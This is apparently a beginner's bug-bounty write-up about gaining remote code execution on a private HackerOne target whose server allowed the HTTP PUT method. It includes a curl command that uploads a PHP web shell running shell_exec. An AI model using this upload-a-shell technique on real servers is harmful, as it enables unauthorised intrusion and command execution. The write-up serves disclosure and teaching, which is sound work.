.png)
3 years ago
175 BOOK THIS SPACE FOR AD
ARTICLE ADRce via server misconfiguration Put Http method enabled
Hey guys today i want to speak about the first ‘Rce’ i found it at a privet program in “hackerone.com” with my best friend “Ahmed elmalkey”,
First we make subdomain-enumeration via many tools like ”subfinder with api keys ” now we had subdomains we went to check live subdomains after that
we sent the live subdomains to Nuceli after 5 min we Got a alert “http method enabled” “oh no is this real or false positive “ we said
we went to check was the alert is real or no
curl -X options https://target.ltd
GET,PUT,HEAD enabled hey this is real now we went to make POC
curl -X PUT https://target.tld/POC.php
-H “Content-Length: 69;Accept: */* “ -d “<?php
$output = shell_exec(‘ls -lart’);
echo “<pre>$output</pre>”;
?>”
now we got rce at server done.
thanks for read the essay and i’m sorry for any misspell because this my first writeup
Bengali (Bangladesh) · 
English (United States) ·